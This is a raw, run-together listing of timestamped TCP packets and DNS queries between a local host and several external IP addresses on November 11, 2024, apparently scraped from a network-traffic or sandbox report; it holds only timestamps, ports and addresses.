                                                                                                                                                                                                            Nov 11, 2024 18:25:29.553623915 CET8062042199.59.243.227192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.554661989 CET806204323.253.46.64192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.554758072 CET6204380192.168.2.1023.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.798692942 CET44362050188.114.96.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.798748016 CET44362050188.114.96.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.798751116 CET62050443192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.798789978 CET44362050188.114.96.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.798818111 CET62050443192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.798842907 CET44362050188.114.96.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.798856020 CET62050443192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.798871994 CET44362050188.114.96.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.798887014 CET62050443192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.798907042 CET62050443192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.798913002 CET44362050188.114.96.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.798953056 CET44362050188.114.96.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.798989058 CET44362050188.114.96.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.799002886 CET62050443192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.799010992 CET44362050188.114.96.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.799030066 CET62050443192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.799045086 CET62050443192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.799048901 CET44362050188.114.96.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.799171925 CET62050443192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.799371004 CET62050443192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.799397945 CET62050443192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.867173910 CET6204680192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.872427940 CET8062046188.114.96.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:32.205941916 CET8062046188.114.96.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:32.206032991 CET6204680192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:32.211000919 CET62051443192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:32.211051941 CET44362051188.114.96.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:32.211122990 CET62051443192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:32.211364031 CET62051443192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:32.211374998 CET44362051188.114.96.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:32.646962881 CET44362051188.114.96.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:32.647089958 CET62051443192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:32.795435905 CET62051443192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:32.795454025 CET44362051188.114.96.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:32.795795918 CET44362051188.114.96.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:32.795859098 CET62051443192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:32.799824953 CET62051443192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:32.847346067 CET44362051188.114.96.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:33.653757095 CET44362051188.114.96.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:33.653845072 CET62051443192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:33.653878927 CET44362051188.114.96.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:33.653991938 CET62051443192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:33.654238939 CET44362051188.114.96.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:33.654285908 CET62051443192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:33.654293060 CET44362051188.114.96.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:33.654325008 CET62051443192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:33.654406071 CET62051443192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:33.654431105 CET44362051188.114.96.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:33.654433966 CET62051443192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:33.654474974 CET62051443192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:37.542455912 CET6204180192.168.2.10178.162.203.202
                                                                                                                                                                                                            Nov 11, 2024 18:25:37.544277906 CET6205280192.168.2.10178.162.203.202
                                                                                                                                                                                                            Nov 11, 2024 18:25:37.549294949 CET8062052178.162.203.202192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:37.549396038 CET6205280192.168.2.10178.162.203.202
                                                                                                                                                                                                            Nov 11, 2024 18:25:37.549607992 CET6205280192.168.2.10178.162.203.202
                                                                                                                                                                                                            Nov 11, 2024 18:25:37.554754019 CET8062052178.162.203.202192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:39.993695021 CET8062042199.59.243.227192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:39.993757010 CET6204280192.168.2.10199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:25:49.893635035 CET6205280192.168.2.10178.162.203.202
                                                                                                                                                                                                            Nov 11, 2024 18:26:17.895730972 CET8064055103.150.10.48192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:26:17.895893097 CET6405580192.168.2.10103.150.10.48
                                                                                                                                                                                                            Nov 11, 2024 18:26:18.158233881 CET800064057106.15.232.163192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:26:18.158360004 CET640578000192.168.2.10106.15.232.163
                                                                                                                                                                                                            Nov 11, 2024 18:26:18.926469088 CET8064063154.85.183.50192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:26:18.926619053 CET6406380192.168.2.10154.85.183.50
                                                                                                                                                                                                            Nov 11, 2024 18:26:24.146555901 CET806406264.225.91.73192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:26:24.146805048 CET6406280192.168.2.1064.225.91.73
                                                                                                                                                                                                            Nov 11, 2024 18:26:25.475164890 CET804999413.248.169.48192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:26:25.475390911 CET4999480192.168.2.1013.248.169.48
                                                                                                                                                                                                            Nov 11, 2024 18:26:26.501605034 CET806237364.225.91.73192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:26:26.501753092 CET6237380192.168.2.1064.225.91.73
                                                                                                                                                                                                            Nov 11, 2024 18:26:31.038290977 CET8062045154.212.231.82192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:26:31.038492918 CET6204580192.168.2.10154.212.231.82
                                                                                                                                                                                                            Nov 11, 2024 18:26:32.825973034 CET806405976.223.67.189192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:26:32.826165915 CET6405980192.168.2.1076.223.67.189
                                                                                                                                                                                                            Nov 11, 2024 18:27:30.391293049 CET8062044208.100.26.245192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:27:30.391544104 CET6204480192.168.2.10208.100.26.245
Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.256267071 CET53583031.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.258232117 CET53635871.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.259155989 CET53612391.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.272900105 CET6088453192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.273267031 CET6007453192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.279449940 CET5669453192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.280380964 CET53600741.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.283776999 CET53608841.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.290913105 CET53566941.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.298640013 CET5099753192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.299180031 CET5487053192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.299487114 CET6552453192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.309039116 CET53509971.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.310343027 CET53548701.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.310373068 CET53655241.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.341470003 CET5223053192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.359932899 CET5338053192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.360095978 CET5006053192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.360259056 CET6474053192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.360405922 CET5424253192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.360575914 CET5875853192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.360713959 CET5932753192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.367841005 CET53533801.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.371342897 CET53500601.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.372226000 CET53647401.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.372875929 CET53587581.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.374099016 CET53522301.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.393404961 CET53593271.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.398977041 CET53542421.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.450467110 CET53501701.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.475507021 CET53514481.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.498473883 CET5439853192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.533822060 CET6443453192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.537703991 CET5683853192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.537878036 CET5008653192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.538043976 CET5606853192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.542828083 CET53644341.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.549916029 CET53500861.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.556946993 CET53560681.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.689999104 CET5796553192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.690747023 CET5541953192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.691582918 CET5716553192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.692934036 CET5732053192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.694145918 CET5300853192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.697880983 CET53579651.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.700841904 CET53554191.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.701288939 CET53573201.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.703248024 CET5881453192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.703685999 CET5956253192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.704186916 CET53530081.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.710870028 CET53588141.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.721549034 CET5124353192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.722750902 CET53571651.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.727751017 CET6315453192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.728121996 CET6537053192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.732950926 CET53512431.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.736721039 CET53653701.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.739650011 CET53631541.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.755935907 CET53568381.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.792912960 CET5056053192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.800977945 CET53505601.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.802239895 CET5415553192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.802479029 CET5050153192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.802581072 CET4934053192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.809895039 CET6535253192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.810909033 CET6203453192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.812875032 CET6493353192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.814166069 CET5201153192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.821202993 CET53493401.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.827467918 CET6354753192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.836296082 CET5465853192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.840799093 CET53653521.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.842366934 CET53620341.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.844266891 CET53649331.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.845145941 CET53520111.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.931998968 CET6360453192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.932085037 CET6294753192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.933690071 CET6423153192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.943121910 CET53629471.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.967415094 CET53642311.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.002856970 CET53505011.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.017436028 CET53541551.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.054663897 CET53635471.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.087069988 CET53546581.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.174948931 CET53636041.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.428297043 CET53543981.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.641140938 CET53595621.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.018100977 CET5084953192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.019819021 CET4919953192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.022578001 CET5255853192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.023070097 CET5773853192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.025095940 CET5248753192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.025352955 CET5292153192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.026664972 CET6477353192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.027328014 CET6231653192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.027954102 CET6232253192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.029026031 CET53508491.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.029300928 CET5160653192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.030136108 CET4989953192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.030690908 CET6486653192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.031188965 CET6414453192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.031357050 CET53491991.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.031656981 CET5091553192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.032268047 CET53525581.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.033529043 CET5117553192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.096893072 CET53609311.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.097089052 CET5542753192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.097141027 CET53562611.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.097523928 CET5986153192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.099051952 CET6040953192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.099971056 CET6447653192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.100871086 CET5065753192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.102935076 CET5597553192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.103333950 CET5972653192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.106138945 CET5004053192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.106456041 CET5776853192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.106992960 CET53554271.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.107441902 CET5650853192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.107947111 CET6075253192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.108340979 CET5352853192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.109929085 CET5361453192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.110202074 CET53604091.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.110853910 CET53506571.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.112447977 CET5461653192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.112870932 CET53559751.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.112998962 CET6154653192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.113352060 CET5922553192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.114106894 CET4930853192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.116961956 CET53577681.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.120963097 CET5193653192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.121244907 CET5487053192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.124156952 CET5792453192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.125891924 CET5265553192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.126101017 CET6354253192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.129201889 CET5149553192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.129405022 CET5963453192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.129729033 CET6461953192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.130438089 CET5505353192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.130765915 CET5457453192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.130964994 CET4927653192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.131062031 CET5068553192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.139609098 CET6367253192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.139802933 CET6322853192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.139982939 CET5251653192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.140218973 CET6121653192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.140619040 CET6301553192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.140808105 CET5372153192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.145772934 CET6094553192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.146028996 CET5307453192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.146028996 CET6227253192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.146271944 CET5079853192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.146450043 CET5300153192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.146805048 CET6128253192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.147512913 CET5066253192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.147876024 CET5600453192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.148066044 CET5373953192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.148274899 CET5132853192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.150913954 CET6285253192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.151372910 CET6540153192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.154041052 CET5614553192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.154139996 CET5392053192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.379077911 CET53565081.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.379097939 CET53535281.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.379110098 CET53536141.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.379134893 CET53644761.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.379190922 CET53597261.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.379225016 CET53607521.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.379409075 CET53539081.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.381617069 CET53632281.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.383512020 CET53636721.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.383599043 CET53579241.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.383754969 CET53646191.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.383790016 CET53612161.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.383809090 CET53596341.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.383873940 CET53548701.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.383927107 CET53545741.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.384300947 CET53526551.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.384469986 CET53493081.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.384562969 CET53550531.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.385045052 CET53615461.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.385720015 CET53530011.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.386229038 CET53507981.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.386240959 CET53537391.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.386251926 CET53539201.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.386354923 CET53630151.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.386470079 CET53612821.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.386482000 CET53506621.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.386957884 CET53622721.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.387304068 CET53628521.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.388591051 CET53513281.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.398844004 CET53598611.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.404329062 CET53592251.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.404455900 CET53635421.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.404500008 CET53514951.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.405039072 CET53506851.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.405344963 CET53519361.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.405987978 CET53546161.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.406893969 CET53525161.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.406940937 CET53654011.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.407188892 CET53560041.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.407538891 CET53609451.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.407551050 CET53537211.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.407603025 CET53530741.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.410672903 CET53492761.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.509727955 CET53500401.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.566497087 CET53561451.1.1.1192.168.2.10
